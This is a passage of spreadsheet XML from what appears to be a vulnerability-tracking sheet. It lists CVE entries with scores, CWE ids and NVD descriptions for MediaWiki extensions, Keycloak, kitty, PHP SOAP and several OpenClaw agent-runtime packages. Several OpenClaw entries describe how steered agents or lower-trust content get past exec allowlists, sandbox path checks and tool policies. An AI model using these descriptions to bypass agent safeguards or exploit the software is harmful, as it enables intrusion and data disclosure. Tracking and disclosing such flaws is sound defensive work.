      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S232" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Mediawiki - Cargo extension allows Reflected XSS.
This issue affects Mediawiki - Cargo extension: through 3.9.4.</t>
        </is>
      </c>
      <c r="T232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96877</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96878</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="inlineStr"/>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr">
        <is>
          <t>go, cargo</t>
        </is>
      </c>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S233" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Mediawiki - Cargo extension allows Reflected XSS.
This issue affects Mediawiki - Cargo extension: through 3.9.4.</t>
        </is>
      </c>
      <c r="T233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96878</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96879</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="inlineStr"/>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr"/>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="S234" s="5" t="inlineStr">
        <is>
          <t>Improper removal of sensitive information before storage or transfer vulnerability in Wikimedia Foundation's Mediawiki - FlaggedRevs extension through 1.46.0.</t>
        </is>
      </c>
      <c r="T234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96879</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100540</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="inlineStr"/>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S235" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Feishu before 2026.8.1 fails to validate whether a configured default account is disabled before selecting it for model tool operations. Attackers can exploit multi-account setups where a disabled default account retains credentials to read or modify Feishu resources through a revoked identity.</t>
        </is>
      </c>
      <c r="T235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100540</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80431</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="inlineStr"/>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr"/>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S236" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds Write in the natural width branch of the text sizing protocol in kitty from 0.40.0 before 0.49.0 allows a program writing to the terminal to write past the end of a fixed-size buffer, because screen_handle_multicell_command() in kitty/screen.c appends each codepoint of a grapheme cluster with lc.chars[lc.count++] = ch without any capacity check, while lc is declared by the RAII_ListOfChars macro as a four-element char_type array in the function's stack frame, so an OSC 66 escape code whose payload carries a grapheme cluster longer than four codepoints writes beyond that buffer, one 32-bit value per additional codepoint, in the order the codepoints appear. Where the cluster is preceded in the same payload by a sequence that causes an intermediate flush, the buffer is first migrated to the heap by ensure_space_for_chars() and the write occurs past the heap allocation instead. This results in termination of the kitty process and therefore of all its windows, tabs and child processes.</t>
        </is>
      </c>
      <c r="T236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80431</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97846</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr">
        <is>
          <t>keycloak, gin</t>
        </is>
      </c>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S237" s="5" t="inlineStr">
        <is>
          <t>Keycloak provides a feature called mTLS holder-of-key binding which ensures that a token can only be used by the client that originally requested it by binding it to their digital certificate. A flaw was discovered where the new Standard Token Exchange V2 feature does not check for this certificate. This allows an attacker with stolen client credentials to obtain a standard, unrestricted token that bypasses these security protections.</t>
        </is>
      </c>
      <c r="T237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97846</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100584</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="inlineStr"/>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q238" s="5" t="inlineStr"/>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="S238" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an npm-distributed agent runtime. In versions &gt;= 2026.2.26 and &lt; 2026.7.1, PowerShell command analysis on Windows hosts running in exec allowlist mode could approve an exact executable resolved from PATH but subsequently execute a same-named executable located in the workspace directory. If lower-trust content can place an executable with an approved basename into an agent-writable workspace and steer an approved PowerShell command that uses a bare executable name, OpenClaw may run the workspace file instead of the allowlisted path, executing arbitrary code with the privileges of the Gateway or node-host user. The issue does not require replacement of the approved executable itself. Version 2026.7.1 contains a fix; as a workaround, avoid bare executable names in approved PowerShell commands and keep executable files out of agent-writable workspaces.</t>
        </is>
      </c>
      <c r="T238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100584</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96448</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q239" s="5" t="inlineStr"/>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="S239" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Fine-Grained Admin Permissions (FGAP v2) feature of Keycloak, an identity and access management solution. The issue occurs when the system checks if a delegated administrator has permission to assign a specific role to a user. Because the check does not look inside composite roles to see what other permissions they contain, an administrator with limited rights can assign a role that secretly includes full administrative control. This allows the attacker to gain complete management access over the entire realm.</t>
        </is>
      </c>
      <c r="T239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96448</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-14181</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="inlineStr"/>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr"/>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q240" s="5" t="inlineStr"/>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S240" s="5" t="inlineStr">
        <is>
          <t>The SOAP HTTP client guards its response buffer growth with a check that relies on signed integer overflow, which is undefined behaviour and is not guaranteed to trigger. When the check is optimised away, a malicious SOAP server can make the client allocate a buffer far smaller than the data it then writes into it, producing a heap buffer overflow.</t>
        </is>
      </c>
      <c r="T240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-14181</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100192</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="inlineStr"/>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K241" s="5" t="inlineStr"/>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q241" s="5" t="inlineStr"/>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S241" s="5" t="inlineStr">
        <is>
          <t>X-SpringBoot through 6.0 exposes appKey and appSecret credentials in the GET /application/manager/select endpoint without authentication or field filtering. Unauthenticated attackers can retrieve these credentials and use them to send arbitrary SMS messages through any tenant's SMS provider, enabling SMS bombing and impersonation attacks.</t>
        </is>
      </c>
      <c r="T241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100192</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100501</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="inlineStr"/>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q242" s="5" t="inlineStr"/>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="S242" s="5" t="inlineStr">
        <is>
          <t>Flame through 2.4.0 contains an improper restriction of excessive authentication attempts vulnerability in the POST /api/auth login endpoint that allows unauthenticated attackers to brute-force the admin password. Attackers can submit unlimited password guesses without rate limiting, attempt counters, lockouts, or delays to gain full administrator access and modify application configuration.</t>
        </is>
      </c>
      <c r="T242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100501</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100531</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="inlineStr"/>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q243" s="5" t="inlineStr"/>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S243" s="5" t="inlineStr">
        <is>
          <t>The @openclaw/slack npm package before 2026.8.1 contains an authorization flaw in its Slack download-file handler: when a file lacks the share metadata used to prove it belongs to the requested conversation, the conversation-authorization check fails open. An authenticated caller restricted to a single conversation who knows or obtains a file identifier can therefore download file contents from outside that conversation's scope, disclosing data across configured conversation boundaries. The issue does not allow listing arbitrary Slack files and does not bypass Slack authentication itself. The issue is fixed in version 2026.8.1.</t>
        </is>
      </c>
      <c r="T243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100531</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100536</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="inlineStr"/>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q244" s="5" t="inlineStr"/>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S244" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 fail to validate all source fields in structured message attachments, allowing attackers to hide unvalidated host paths behind allowed attachment sources. Attackers can exploit this by providing multiple source fields to bypass sandbox path validation and cause Telegram delivery to read and send known host files that would otherwise be rejected.</t>
        </is>
      </c>
      <c r="T244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100536</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100538</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="inlineStr"/>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q245" s="5" t="inlineStr"/>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S245" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 does not apply the originating sender's global or per-agent toolsBySender policy when handling outbound attachments. A sender that has been explicitly denied filesystem read tools can still cause a known local file to be read and returned via a final-response media directive or a message attachment, disclosing local file contents to an admitted requester whose agent turn did not include the read tool. Exploitation requires knowledge or derivation of a useful host path and a delivery flow that accepts local attachments. The issue is fixed in version 2026.8.1.</t>
        </is>
      </c>
      <c r="T245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100538</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100566</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="inlineStr"/>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr"/>
      <c r="K246" s="5" t="inlineStr"/>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q246" s="5" t="inlineStr"/>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S246" s="5" t="inlineStr">
        <is>
          <t>OpenClaw LINE versions before 2026.8.1 contain an access control vulnerability where group allowlist mode silently inherits DM allowFrom values when groupAllowFrom is not explicitly configured. Attackers with group participation can trigger the agent despite configured group allowlist restrictions when DM access is broader than intended group access.</t>
        </is>
      </c>
      <c r="T246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100566</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100582</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="inlineStr"/>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr">
        <is>
          <t>react, go, gin, rust</t>
        </is>
      </c>
      <c r="K247" s="5" t="inlineStr"/>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q247" s="5" t="inlineStr"/>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S247" s="5" t="inlineStr">
        <is>
          <t>OpenClaw channel plugins (@openclaw/msteams, @openclaw/feishu, @openclaw/matrix, and @openclaw/googlechat) before 2026.8.1 do not enforce the configured channel read allowlist for caller-supplied explicit read targets in message, reaction, pin, member, and related metadata read actions. A lower-trust sender or a steered agent with access to a channel read action can therefore retrieve content or metadata from channels or rooms excluded by the operator's read policy; the practical impact depends on the permissions held by the connected bot account. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100582</t>
        </is>
      </c>
